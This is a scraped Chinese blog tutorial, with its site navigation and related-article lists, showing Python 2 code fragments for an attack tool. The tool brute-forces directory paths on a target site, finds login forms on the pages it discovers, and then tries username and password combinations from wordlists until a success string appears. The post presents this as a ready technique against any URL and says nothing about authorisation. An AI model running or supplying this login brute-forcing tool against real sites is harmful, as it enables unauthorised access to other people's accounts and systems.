首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

python遍历路径破解表单的示例

- Author -

Misaki''s

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python 远程统计文件代码分享
May 14 Python
python如何修改装饰器中参数
Mar 20 Python
python 编写简单网页服务器的实例
Jun 01 Python
详解Django中间件的5种自定义方法
Jul 26 Python
详解Django项目中模板标签及模板的继承与引用(网站中快速布置广告)
Mar 27 Python
python实现随机漫步方法和原理
Jun 10 Python
如何使用python爬虫爬取要登陆的网站
Jul 12 Python
Django框架之登录后自定义跳转页面的实现方法
Jul 18 Python
Python实现元素等待代码实例
Nov 11 Python
用Python生成HTML表格的方法示例
Mar 06 Python
python线程里哪种模块比较适合
Aug 02 Python
python归并排序算法过程实例讲解
Nov 04 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
for(1) cvzone(1) okenizer(1) 无限迭代(1) re模块(2) SnakeGame(1) 分词器(1) 计算机视觉(2) while(1) mediapipe(1)
You might like
php中文字母数字验证码实现代码
2008/04/25 PHP
学习php设计模式 php实现命令模式(command)
2015/12/08 PHP
PHP控制反转(IOC)和依赖注入(DI)
2017/03/13 PHP
PHP下 Mongodb 连接远程数据库的实例代码
2017/08/30 PHP
php5与php7的区别点总结
2019/10/11 PHP
Javascript中3种实现继承的方法和代码实例
2014/08/12 Javascript
JQuery实现防止退格键返回的方法
2015/02/12 Javascript
Vue数组更新及过滤排序功能
2017/08/10 Javascript
vue组件watch属性实例讲解
2017/11/07 Javascript
Vue slot用法(小结)
2018/10/22 Javascript
jQuery实现经典的网页3D轮播图封装功能【附源码下载】
2019/02/15 jQuery
Vue实现类似Spring官网图片滑动效果方法
2019/03/01 Javascript
Express结合Webpack的全栈自动刷新
2019/05/23 Javascript
基于Vue SEO的四种方案(小结)
2019/07/01 Javascript
[47:36]Optic vs Newbee 2018国际邀请赛小组赛BO2 第二场 8.17
2018/08/18 DOTA
python简单的函数定义和用法实例
2015/05/07 Python
python基于itchat实现微信群消息同步机器人
2017/02/27 Python
Django添加KindEditor富文本编辑器的使用
2018/10/24 Python
用Python写一个自动木马程序
2019/09/17 Python
python读写Excel表格的实例代码(简单实用)
2019/12/19 Python
Python调用.net动态库实现过程解析
2020/06/05 Python
python 制作python包,封装成可用模块教程
2020/07/13 Python
python数据抓取3种方法总结
2021/02/07 Python
使用简单的CSS3属性实现炫酷读者墙效果
2014/01/08 HTML / CSS
CSS3 flex布局之快速实现BorderLayout布局
2015/12/03 HTML / CSS
世界上最大的在线旅行社新加坡网站:Expedia新加坡
2016/08/25 全球购物
伦敦所有西区剧院演出官方票务代理:Theatre Tickets Direct
2017/05/26 全球购物
印度排名第一的蛋糕、鲜花和礼品送货:Winni
2019/08/02 全球购物
财经学院自荐信范文
2014/02/02 职场文书
学雷锋活动总结范文
2014/04/25 职场文书
班级年度安全计划书
2014/05/01 职场文书
2014大学生批评与自我批评思想汇报
2014/09/21 职场文书
个人合作协议范本
2015/08/06 职场文书
资产移交协议书
2016/03/24 职场文书
python中的3种定义类方法
2021/11/27 Python
SQL Server使用T-SQL语句批处理
2022/05/20 SQL Server